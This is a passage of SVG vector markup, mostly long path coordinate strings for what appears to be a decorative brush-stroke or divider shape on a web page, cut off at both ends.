1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path 